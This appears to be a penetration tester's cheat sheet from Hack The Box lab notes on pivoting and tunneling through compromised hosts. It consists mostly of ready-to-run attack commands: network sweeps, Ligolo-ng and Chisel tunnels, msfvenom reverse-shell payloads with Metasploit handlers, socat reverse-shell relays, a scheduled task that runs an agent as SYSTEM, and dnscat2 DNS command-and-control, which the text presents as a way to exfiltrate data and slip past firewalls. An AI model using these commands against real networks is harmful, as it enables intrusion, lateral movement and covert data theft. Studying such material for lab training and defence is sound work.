Portforwarding and tunneling
Commands to enumerate internal networks
PS C:\> Get-NetNeighbor -AddressFamily IPv4
PS C:\> Test-NetConnection -ComputerName 192.168.210.13 -Port 443
PS C:\> Test-WSMan -ComputerName 192.168.1.10
PS C:\> arp -a
PS C:\> route printIntrusionz3r0X@htb[/htb]$ arp -n
Intrusionz3r0X@htb[/htb]$ route -4Ping Sweep
Intrusionz3r0X@htb[/htb]$ for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done
C:\\> for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"
PS C:\\> 1..254 | % { $ip="192.168.210.$_"; if (Test-Connection -Count 1 -ComputerName $ip -Quiet) { "$ip`: True" } }
meterpreter > run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23Ligolo NG
#Start the server Proxy
Intrusionz3r0X@htb[/htb]$ sudo ./proxy -selfcert -laddr 10.10.14.3:443
#Create the interface
ligolo-ng >> interface_create --name "ligolo" #Inside the proxy agent
#Connect the agent to our proxy server
Target@htb[/htb]$ ./agent -connect <ip-address>:<port> -ignore-cert
#Switch beetween session
ligolo-ng >> session
#Check the Network configuration and identify the subnet
ligolo-ng >> ifconfig
#Create the entry
ligolo-ng >> interface_add_route --name ligolo --route x.x.x.x/24 #Inside the proxy agent
#Start the tunneling
[ligolo-ng >> tunnel_start --tun ligolo
Configure double pivoting
You have to create for each pivot a new interface and specify the subnet to reach either /24 to access the entire subnet or /32 for specific host.
Note: --addr parameter port has to increase on one to facilitate the manage of all tunnels
#Create new interface for the new pivot host
ligolo-ng >> interface_create --name "ligolo2" #Inside the proxy agent
#Set up Listener
ligolo-ng >> listener_add --addr 0.0.0.0:1160x --to 127.0.0.1:11601 --tcp
ligolo-ng >> listener_list
Target@htb[/htb]$ ./agent -connect <subnet-ip-address-previous-pivot>:11601 -ignore-cert
#Switch beetween session
ligolo-ng >> session
#Check the Network configuration and identify the subnet
ligolo-ng >> ifconfig
#Start the tunneling
[ligolo-ng >> tunnel_start --tun ligolo2
#Create the entry
ligolo-ng >> interface_add_route --name ligolo2 --route x.x.x.x/xx #Inside the proxy agent
For unstable Sessions:
schtasks /create /tn "MyAgentTask3" /tr "C:\Temp\agent.exe -connect 192.168.110.51:9000 -ignore-cert" /sc once /st (Get-Date).AddMinutes(1).ToString("HH:mm") /ru SYSTEM
nohup ./agent -connect 192.168.110.55:9001 -ignore-cert > agent.log 2>&1Chisel
#The Chisel listener will listen for incoming connections on port 1234 using SOCKS5 (--socks5) and forward it to all the networks that are accessible from the pivot host.
target@WEB01:~$ ./chisel server -v -p 1234 --socks5
Intrusionz3r0X@htb[/htb]$ ./chisel client -v 10.129.202.64:1234 socks
#If there is a firewall restrict inbound connection use reverse tunneling
Intrusionz3r0X@htb[/htb]$ sudo ./chisel server --reverse -v -p 1234 --socks5
target@WEB01$ ./chisel client -v 10.10.14.17:1234 R:socksChisel double pivoting
On our local Kali:
Intrusionz3r0X@htb[/htb]$ ./chisel_linux server --socks5 -p 9001 --reverseModify the
#add the line one at the time and as you go otherwise the proxy doesn't work
socks5 127.0.0.1 1080
socks5 127.0.0.1 1090
#Now close any Socks4 connection (e.g. SSH Dynamic Port Forward) and comment in /etc/proxychains
#socks4 127.0.0.1 9050Pivot Host:
./chisel_linux client 10.10.14.227:9001 R:9999:socks
./chisel_linux server -p 9002 --reverse --socks5Subnetwork Target host:
chisel.exe client 172.16.8.120:9002 R:8888:socksScan the entire IP list one line
Target@htb[/htb]$ wget https://github.com/andrew-d/static-binaries/raw/refs/heads/master/binaries/linux/x86_64/nmap
Target@htb[/htb]$ chmod +x nmap
Target@htb[/htb]$ cat alive_host.txt
192.168.110.1
192.168.110.51
192.168.110.52
192.168.110.53
192.168.110.54
192.168.110.55
Target@htb[/htb]$ cat alive_host.txt | while read ip; do (./nmap -p- --open -Pn -n -T5 --min-rate 3000 -vvv -oG "${ip}_tcp_allports" $ip);doneLocal Port Forwarding over SSH
#Local Port Forwarding over SSH
Intrusionz3r0X@htb[/htb]$ ssh -L 1234:localhost:3306 ubuntu@10.129.202.64
Intrusionz3r0X@htb[/htb]$ ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@10.129.202.64
#Dynamic SSH tunneling over SOCKS proxy
Intrusionz3r0X@htb[/htb]$ ssh -D 9050 ubuntu@10.129.202.64 Remote/Reverse Port Forwarding with SSH
#Remote/Reverse Port Forwarding with SSH
Intrusionz3r0X@htb[/htb]$ msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8000
msf6 exploit(multi/handler) > run
Intrusionz3r0X@htb[/htb]$ ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN
#Execute payloadMeterpreter Tunneling & Port Forwarding
#Meterpreter Tunneling & Port Forwarding
Intrusionz3r0X@htb[/htb]$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 -f elf -o backupjob LPORT=8080
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8080
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
#(ctrl+z)
#Configuring MSF's SOCKS Proxy
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 9050
msf6 auxiliary(server/socks_proxy) > set SRVHOST 0.0.0.0
msf6 auxiliary(server/socks_proxy) > set version 4a
msf6 auxiliary(server/socks_proxy) > run
#Creating Routes with AutoRoute
msf6 > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set SESSION 1
msf6 post(multi/manage/autoroute) > set SUBNET 172.16.5.0
msf6 post(multi/manage/autoroute) > run
#It is also possible to add routes with autoroute by running autoroute from the Meterpreter session.
meterpreter > run autoroute -s 172.16.5.0/23
#Listing Active Routes with AutoRoute
meterpreter > run autoroute -p
#Port Forwarding
meterpreter > portfwd add -l 3300 -p 3389 -r 172.16.5.19
#Reverse Port Forwarding
meterpreter > portfwd add -R -l 8081 -p 1234 -L 10.10.14.18
Socat
#Starting Socat Listener
ubuntu@Webserver:~$ socat TCP4-LISTEN:<intermediaryHostPort>,fork TCP4:10.10.14.18:<AttackhostPort>
#Socat Reverse shell
target@Webserver:~$ socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:443
Intrusionz3r0X@htb[/htb]$ msfvenom -p windows/shell_reverse_tcp LHOST=172.16.5.129 -f exe -o exploit.exe LPORT=8080
SSH Pivoting with Sshuttle
Intrusionz3r0X@htb[/htb]$ sudo apt-get install sshuttle
Intrusionz3r0X@htb[/htb]$ sudo sshuttle -r ubuntu@10.129.202.64 <ip-range> -v RPivot
Intrusionz3r0X@htb[/htb]$ git clone <https://github.com/klsecservices/rpivot.git>
Intrusionz3r0X@htb[/htb]$ sudo apt-get install python2.7
#Alternative to install python2.7
Intrusionz3r0X@htb[/htb]$ curl <https://pyenv.run> | bash
Intrusionz3r0X@htb[/htb]$ echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc
Intrusionz3r0X@htb[/htb]$ echo 'command -v pyenv >/dev/null || export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc
Intrusionz3r0X@htb[/htb]$ echo 'eval "$(pyenv init -)"' >> ~/.bashrc
Intrusionz3r0X@htb[/htb]$ source ~/.bashrc
Intrusionz3r0X@htb[/htb]$ pyenv install 2.7
Intrusionz3r0X@htb[/htb]$ pyenv shell 2.7
#Running server.py from the Attack Host
Intrusionz3r0X@htb[/htb]$ python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
#Running the client.py to create the tunnerl socks
ubuntu@WEB01:~/rpivot$ python2.7 client.py --server-ip 10.10.14.18 --server-port 9999
#NTLM Authentication (If the internal network uses an HTTP proxy with NTLM authentication)
ubuntu@WEB01:~/rpivot$ python client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password>
Port Forwarding with Windows Netsh
C:\\Windows\\system32> netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25
C:\\Windows\\system32> netsh.exe interface portproxy show v4tov4DNS Tunneling with Dnscat2
DNS Tunneling with Dnscat2: Dnscat2 is a tool that allows data to be tunneled through the DNS protocol, using an encrypted command-and-control (C2) channel. By embedding data within DNS TXT records, it enables stealthy communication between an attacker's server and a compromised host. This method can bypass traditional network defenses like firewalls and intrusion detection systems, making it a potent tool for exfiltrating data and maintaining remote control over compromised systems in a covert manner.
Intrusionz3r0X@htb[/htb]$ git clone <https://github.com/iagox86/dnscat2.git>
Intrusionz3r0X@htb[/htb]$ sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache
#DNSCAT2 for windows
Intrusionz3r0X@htb[/htb]$ git clone <https://github.com/lukebaggett/dnscat2-powershell.git>
PS C:\\htb> Import-Module .\\dnscat2.ps1
PS C:\\htb> Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret <secret> -Exec cmdICMP Tunneling
go build --ldflags '-linkmode external -extldflags "-static"'Last updated
